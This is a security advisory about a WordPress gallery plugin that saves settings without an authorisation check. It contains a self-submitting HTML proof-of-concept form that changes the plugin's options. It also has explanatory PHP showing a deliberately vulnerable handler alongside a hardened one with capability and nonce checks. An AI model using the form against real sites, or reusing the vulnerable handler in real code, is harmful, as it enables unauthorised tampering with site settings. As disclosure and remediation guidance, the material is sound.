Description: The plugin does not have an authorisation check when updating its settings, which could allow any authenticated user, such as a subscriber, to update them.
<html>
<body>
<form action="http://WP/wp-admin/options-general.php" method="POST">
<input type="hidden" name="bar_size" value="anything" />
<input type="hidden" name="indexIndicatorSep" value="anything" />
<input type="hidden" name="loop_images" value="1" />
<input type="hidden" name="show_close_element" value="1" />
<input type="hidden" name="show_fullscreen_element" value="1" />
<input type="hidden" name="show_zoom_element" value="1" />
<input type="hidden" name="show_share_element" value="1" />
<input type="hidden" name="show_counter_element" value="1" />
<input type="hidden" name="show_arrow_element" value="1" />
<input type="hidden" name="show_preloader_element" value="1" />
<input type="hidden" name="tap_to_toggle_controls" value="1" />
<input type="hidden" name="photoswipe_save" value="Save Settings" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
The response to the request above is a 403, but the settings update still happens.
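The behaviour above (a 403 response yet a saved update) is typical of a settings handler that processes `$_POST` on an early hook such as `admin_init`, which WordPress fires before `options-general.php` performs its own `manage_options` check; whether that is the exact cause here is not established by this advisory. The following is an added example, not the plugin's own code, showing a handler of that shape first with the missing check and then hardened with a capability check and a nonce. Option keys mirror the field names in the PoC; the function names and the nonce action/field names are hypothetical.

```php
<?php
// Added example (not the plugin's code). Option keys follow the PoC field names;
// function names and nonce names are hypothetical.

// Pattern with the defect described in the advisory: any request carrying
// photoswipe_save is honoured, with no capability or nonce check.
function example_save_settings_vulnerable() {
    if ( ! isset( $_POST['photoswipe_save'] ) ) {
        return;
    }
    update_option( 'loop_images', empty( $_POST['loop_images'] ) ? 0 : 1 );
    update_option( 'bar_size', sanitize_text_field( wp_unslash( $_POST['bar_size'] ?? '' ) ) );
}

// Hardened handler: authorisation first, then CSRF nonce, then allow-listed keys.
function example_save_settings_hardened() {
    if ( ! isset( $_POST['photoswipe_save'] ) ) {
        return;
    }

    // Authorisation: only users allowed to manage options may save settings.
    // Returning a 403 here is what stops the update, rather than the page-level
    // check that runs later.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die(
            esc_html__( 'You are not allowed to update these settings.' ),
            '',
            array( 'response' => 403 )
        );
    }

    // CSRF: the settings form must include
    //   wp_nonce_field( 'example_save_settings', 'example_nonce' );
    // check_admin_referer() dies with a 403 if the nonce is missing or invalid.
    check_admin_referer( 'example_save_settings', 'example_nonce' );

    // Allow-list of checkbox options; anything else in $_POST is ignored.
    $boolean_keys = array(
        'loop_images',
        'show_close_element',
        'show_fullscreen_element',
        'show_zoom_element',
        'show_share_element',
        'show_counter_element',
        'show_arrow_element',
        'show_preloader_element',
        'tap_to_toggle_controls',
    );
    foreach ( $boolean_keys as $key ) {
        update_option( $key, empty( $_POST[ $key ] ) ? 0 : 1 );
    }

    // Free-text options are sanitised before storage.
    $text_keys = array( 'bar_size', 'indexIndicatorSep' );
    foreach ( $text_keys as $key ) {
        update_option( $key, sanitize_text_field( wp_unslash( $_POST[ $key ] ?? '' ) ) );
    }
}

add_action( 'admin_init', 'example_save_settings_hardened' );
```

With the hardened handler, the PoC form fails twice over: a subscriber is rejected by `current_user_can( 'manage_options' )` before any option is written, and even an administrator's browser will not pass `check_admin_referer()` because the attacker's page cannot supply a valid nonce. Registering the options with `register_setting()` and posting to `options.php` is an equivalent alternative, since that path applies both checks itself.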